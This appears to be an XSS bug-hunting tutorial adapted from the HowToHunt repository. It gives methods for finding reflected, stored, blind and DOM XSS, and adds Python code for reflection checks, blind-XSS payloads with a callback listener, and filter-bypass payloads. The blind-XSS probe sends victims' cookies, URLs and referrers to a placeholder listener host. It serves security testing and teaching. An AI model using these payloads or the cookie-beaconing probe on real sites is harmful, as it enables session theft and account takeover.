XSS
Reflected XSS occurs when a value taken from the request (a query parameter, path segment or header) is echoed into the response without proper output encoding, so a crafted link executes script in the victim's browser. Below are some common approaches to finding it.
An extensive mind map detailing approaches to reflected XSS can be found here: by .
Method 1:
Install the Reflection and Sentinel plugins for Burp Suite.
Walk and spider the target site.
Inspect the reflected parameters tab in Burp.
Send parameters to Sentinel for automated analysis, or verify them manually.
Method 2:
Use or to collect URLs.
Filter parameters using grep "=" or GF patterns and store them in a file.
Run or on the file.
Manually inspect reflected parameters or use .
Method 3:
Use the Google Dork: site:target.com
Find links with parameters using dorks such as:
site:target.com inurl:".php?"
site:target.com filetype:php
Check whether the parameters are reflected in the HTML response.
Inject XSS payloads manually or test with automated tools.
Method 4:
Inspect JavaScript and HTML source files for hidden parameters.
Search manually in the page source for:
var=
=""
=''
Append discovered parameters to URLs, e.g.:
https://example.com?hiddenvariablename=xss
Method 5:
Use Methods 1 or 2 to gather URLs.
Find WAF bypass payloads, for example by searching Twitter.
Method 6:
Examine error pages (404, 403, etc.) for reflected values; error templates are often rendered with less care than normal pages and may echo the requested path or parameters unencoded.
Trigger a 403 error by requesting the .htaccess file.
Test all reflected parameters for XSS.
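The "check whether the parameter is reflected" step of the URL-collection and dork methods above, automated for a list of URLs, as an added example (this is not code from the HowToHunt page or from any of the tools it names). For every parameter it injects a canary wrapped around the characters that break out of an HTML context (`< > " ' /`), fetches the page, and reports which of those characters come back unencoded. The target site, the URLs and the `fake_site` responder are constructed so the script runs offline; the hostnames are placeholders.

```python
"""Canary-based reflection check for URL parameters."""
import html
from typing import Callable
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

PROBE_CHARS = '<>"\'/'
PREFIX, SUFFIX = "zq7", "7qz"   # canary delimiters unlikely to occur in a real page

Fetcher = Callable[[str], str]  # maps a URL to the response body


def inject(url: str, param: str, value: str) -> str:
    """Return url with `param` set to `value`; other parameters stay as they are."""
    parts = urlsplit(url)
    query = [(k, value if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))


def reflected_chars(body: str) -> str:
    """Probe characters that appear unencoded between PREFIX and SUFFIX.

    Encoded forms (&lt; &#x27; %3C ...) contain none of the probe characters,
    so a character only counts when it survived verbatim. A backslash-escaped
    quote inside a JS string still counts, so confirm the context by hand
    before calling a hit exploitable.
    """
    survived = set()
    start = body.find(PREFIX)
    while start != -1:
        end = body.find(SUFFIX, start)
        if end == -1:
            break
        middle = body[start + len(PREFIX):end]
        survived.update(c for c in PROBE_CHARS if c in middle)
        start = body.find(PREFIX, end)
    return "".join(c for c in PROBE_CHARS if c in survived)


def check_url(url: str, fetch: Fetcher) -> dict[str, str]:
    """Map each reflected parameter of url to the probe characters it reflects
    unencoded (empty string = reflected but fully encoded). Parameters that
    are not reflected at all are left out."""
    results: dict[str, str] = {}
    for param, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        body = fetch(inject(url, param, PREFIX + PROBE_CHARS + SUFFIX))
        if PREFIX in body:
            results[param] = reflected_chars(body)
    return results


def fake_site(url: str) -> str:
    """Constructed stand-in for a target (no network): `q` is echoed raw, `name`
    is fully HTML-escaped, `ref` is escaped without quotes, `id` is not reflected."""
    p = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return (f"<h1>Results for {p.get('q', '')}</h1>"
            f"<p>Hello {html.escape(p.get('name', ''))}</p>"
            f"<input value=\"{html.escape(p.get('ref', ''), quote=False)}\">")


URLS = [  # constructed sample input, the shape a URL-collection + grep "=" pipeline produces
    "https://target.example/search?q=test&id=7",
    "https://target.example/profile?name=bob&ref=home",
]


def scan(urls: list[str], fetch: Fetcher = fake_site) -> dict[str, dict[str, str]]:
    return {u: check_url(u, fetch) for u in urls}


if __name__ == "__main__":
    for url, found in scan(URLS).items():
        for param, chars in found.items():
            print(f"{url}  param={param}  unencoded={chars or '(none)'}")
```

Against a live target, pass a real fetcher such as `fetch=lambda u: requests.get(u, timeout=10).text`. A parameter that reflects `<>` is a candidate for a tag-based payload; one that reflects only `"` or `'` points at an attribute or script-string context and needs a payload shaped for that context.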
Stored XSS occurs when a malicious payload is persisted by the application (in a database, file or log) and later rendered without encoding to other users, so it fires without the victim having to click a crafted link.
Enumerate the firewall and identify WAF rules.
Test payloads in fields such as:
Username
Address
Inject payloads in profile picture filenames and metadata.
Attempt injections in comments, reviews, and feedback sections.
Try every input field that reflects data to other users.
Register an account with an XSS payload in the name field.
Test entity injection with:
If any payload is executed, refine and escalate the attack.
Blind XSS is stored XSS whose execution you cannot observe directly: the payload is rendered later in a context you never see, such as a back-end system, support tool or admin panel, so the only evidence is an out-of-band callback to infrastructure you control.
Inject payloads that call back to a listener on your server.
Use:
Burp Collaborator
Ngrok for receiving callbacks.
Test injection points such as:
Contact forms
Admin dashboards
User input logs
E-commerce checkout fields
Review and feedback forms
Address fields in e-commerce sites
User-Agent headers
Log viewers
Chat applications
Moderation panels
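A callback listener and a matching set of blind payloads for the injection points listed above, as an added example (not code from the HowToHunt page, from Burp Collaborator or from ngrok). Each payload loads a small probe script from the listener tagged with the injection point; when it runs in an admin panel or log viewer, the probe beacons back the URL it executed on, the cookies and the referrer, so a callback arriving days later can still be attributed to the right field. `LISTENER` is a placeholder for a host you control; the listener itself is plain `http.server`, which you would expose with ngrok or run on a VPS behind TLS.

```python
"""Blind XSS payloads plus the listener that receives their callbacks."""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

LISTENER = "https://blind.example"   # assumed: a host you control (placeholder)
CALLBACKS: list[dict] = []           # executions reported so far


def safe_tag(tag: str) -> str:
    """Tags name the injection point (e.g. 'contact-form'). Restrict the charset
    so a tag can never turn the served probe into an injection on your own host."""
    return re.sub(r"[^A-Za-z0-9_-]", "", tag) or "untagged"


def probe_js(tag: str) -> str:
    """Script the victim's browser loads; it beacons back where it ran."""
    return (
        "(function(){var d=document;new Image().src="
        f"'{LISTENER}/cb?tag={safe_tag(tag)}'"
        "+'&u='+encodeURIComponent(location.href)"
        "+'&c='+encodeURIComponent(d.cookie)"
        "+'&r='+encodeURIComponent(d.referrer);})();"
    )


def build_payloads(tag: str) -> dict[str, str]:
    """Blind payloads for the usual injection contexts, each loading the probe.
    'html' closes a possible enclosing attribute first; 'attribute' relies on the
    page's own closing quote; 'js_string' breaks out of a single-quoted string."""
    src = f"{LISTENER}/p.js?tag={safe_tag(tag)}"
    loader = (f"var s=document.createElement('script');s.src='{src}';"
              "document.body.appendChild(s)")
    return {
        "html":       f'"><script src={src}></script>',
        "attribute":  f'" autofocus onfocus="{loader}',
        "js_string":  f"';{loader};//",
        "user_agent": f'Mozilla/5.0 "><script src={src}></script>',
    }


def parse_callback(path: str) -> dict[str, str]:
    """Pull the fields the probe reports out of a /cb?... request path."""
    q = parse_qs(urlsplit(path).query)
    return {k: q.get(k, [""])[0] for k in ("tag", "u", "c", "r")}


class Listener(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urlsplit(self.path)
        if url.path == "/p.js":
            tag = parse_qs(url.query).get("tag", [""])[0]
            self._reply(200, "application/javascript", probe_js(tag))
        elif url.path == "/cb":
            hit = parse_callback(self.path)
            hit["ip"] = self.client_address[0]
            hit["ua"] = self.headers.get("User-Agent", "")
            CALLBACKS.append(hit)
            print(f"[blind xss] tag={hit['tag']} fired at {hit['u']} from {hit['ip']}")
            self._reply(200, "image/gif", "")
        else:
            self._reply(404, "text/plain", "")

    def _reply(self, status: int, ctype: str, body: str):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    for ctx, payload in build_payloads("contact-form").items():
        print(f"{ctx}: {payload}")
    HTTPServer(("0.0.0.0", 8080), Listener).serve_forever()
```

Use a different tag per field and per target so that a callback from the admin side identifies exactly which input was rendered; keep the listener's access log, since a `/p.js` fetch without a `/cb` beacon still tells you the tag was rendered as a script even if a CSP blocked the probe's image request.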
DOM XSS occurs when client-side JavaScript reads attacker-controlled data from a source such as location.hash, location.search or document.referrer and passes it to a sink such as innerHTML, document.write or eval without sanitization; the payload may never reach the server, so proxies and server logs do not show it.
Manual detection is difficult; use tools like:
Burp Suite PRO
Replace < and > with HTML entities:
Use XSS polyglots:
Bypass lowercase filtering:
Break firewall regex using new lines:
Double Encoding:
Recursive filters bypass:
Injecting anchor tags without whitespace:
Bypassing whitespace filtering using a bullet (•):
Changing request methods:
Injecting CRLF characters for HTTP response splitting:
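Why several of the bypasses listed above work, shown against the filtering mistakes they exploit, as an added example (not code from the HowToHunt page; the filters are constructed models of common mistakes, not any real WAF's rules). Each filter function returns True when it blocks a payload; `demonstrate()` pairs every technique with a payload the filter lets through and with what the browser actually ends up parsing once the application's own decoding has run.

```python
"""Naive XSS filters and the payload shapes that get past them."""
import html
import re
from urllib.parse import unquote


def lowercase_only(s: str) -> bool:
    """Case-sensitive blocklist; HTML tag names are case-insensitive."""
    return "<script" in s


def single_pass_strip(s: str) -> str:
    """Removes '<script>' in one pass instead of until nothing changes, so the
    removed span can be used to reassemble the tag."""
    return s.replace("<script>", "")


def regex_no_dotall(s: str) -> bool:
    """Blocks <script ...>...</script>, but '.' does not match a newline."""
    return re.search(r"<script[^>]*>.*</script>", s) is not None


def single_decode_check(s: str) -> bool:
    """WAF URL-decodes once and looks for '<'; the application decodes again."""
    return "<" in unquote(s)


def raw_lt_check(s: str) -> bool:
    """Blocks a literal '<', but the application HTML-decodes the stored value
    before rendering it."""
    return "<" in s


def anchor_with_space(s: str) -> bool:
    """Expects '<a href'; the HTML tokenizer also accepts '/' between tag name
    and attribute."""
    return re.search(r"<a\s+href", s, re.I) is not None


def demonstrate() -> dict[str, tuple[bool, str]]:
    """technique -> (filter blocks the bypass payload?, markup the browser parses)."""
    cases = {}

    p = "<ScRiPt>alert(1)</ScRiPt>"
    cases["case"] = (lowercase_only(p), p)

    p = "<scr<script>ipt>alert(1)</script>"
    cases["recursive"] = (False, single_pass_strip(p))   # stripping once rebuilds the tag

    p = "<script>\nalert(1)\n</script>"
    cases["newline"] = (regex_no_dotall(p), p)

    p = "%253Cscript%253Ealert(1)%253C/script%253E"       # '<' encoded twice
    cases["double_encoding"] = (single_decode_check(p), unquote(unquote(p)))

    p = "&lt;img src=x onerror=alert(1)&gt;"
    cases["html_entities"] = (raw_lt_check(p), html.unescape(p))

    p = "<a/href=javascript:alert(1)>x</a>"
    cases["no_whitespace"] = (anchor_with_space(p), p)
    return cases


if __name__ == "__main__":
    for name, (blocked, seen) in demonstrate().items():
        print(f"{name:16} blocked={blocked!s:5} browser parses: {seen!r}")
```

The common thread is that the filter and the browser (or the filter and the application's later decoding step) disagree about what the input means. When a payload is blocked, look for that gap: what does the application decode or normalise after the check, and what does the HTML tokenizer accept that the filter's regex does not.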
More dorks:
Identify the firewall using .
Use to discover hidden parameters.
Enhanced and reformatted for HowToHunt repository by